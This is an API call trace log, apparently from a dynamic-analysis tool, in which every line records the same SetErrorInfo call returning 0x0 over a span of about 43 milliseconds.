[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.054] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.054] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.054] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.054] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.054] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.054] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.055] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.055] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.055] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.055] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.055] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.055] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.055] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.055] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.057] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.057] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.057] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.057] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.057] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.057] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.058] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.058] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.058] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.058] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.058] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.058] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.058] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.059] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.059] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.059] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.059] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.059] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.059] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.060] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.060] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.060] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.060] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.060] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.060] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.061] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.061] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.061] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.061] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.061] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.061] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.062] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.062] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.062] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.062] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.062] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.062] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.064] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.069] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.069] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.069] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.069] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.069] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.069] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.069] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.070] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.070] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.070] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.070] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.070] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.070] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.070] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.072] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.072] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.072] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.072] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.072] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.072] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.072] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.073] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.073] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.073] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.073] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.073] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.073] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.073] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.075] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.075] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.075] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.075] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.075] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.075] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.075] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.075] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.076] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.076] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.076] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.076] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.076] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.077] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.077] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.077] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.077] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.077] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.078] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.078] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.078] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.078] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.078] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.078] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.079] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.079] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.079] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.079] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.079] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.083] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.083] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.083] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.083] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.083] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.083] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.084] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.085] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.086] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.086] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.086] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.086] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.086] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.086] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.088] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.090] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.091] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.093] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
